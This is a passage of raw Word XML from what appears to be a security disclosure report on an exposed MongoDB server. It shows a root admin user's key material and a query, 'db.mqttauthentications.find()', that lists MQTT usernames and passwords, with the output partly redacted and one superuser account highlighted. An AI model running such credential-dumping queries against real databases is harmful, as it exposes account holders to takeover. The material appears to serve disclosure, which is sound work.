        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iterationCount: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>15000,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>salt: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'8rL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>storedKey: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'WRt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>serverKey: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'crB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="0" w:right="8305" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="0" w:right="8404" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>roles: [ { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>role: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>', db: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>usernames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>passwords):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.mqttauthentications.find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(30)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>({$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>natural</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.pretty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>usernames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>passwords):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_id: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ObjectId("63b72f52d5b9d77dc636c461"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'758[...]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1115" w:right="6424" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'eyJ[...]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>superUser: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1115" w:right="3596" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>createdAt:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ISODate("2023-01-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>05T20:13:06.918Z"), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>updatedAt: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ISODate("2023-01-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>05T20:13:06.918Z"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="53"/>
          <w:sz w:val="18"/>
          <w:u w:val="single" w:color="775BA1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>v:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_id: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ObjectId("63b70079b32ca9bd21076a74"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'BEU[...]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1115" w:right="6424" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'b4c[...]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>superUser: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
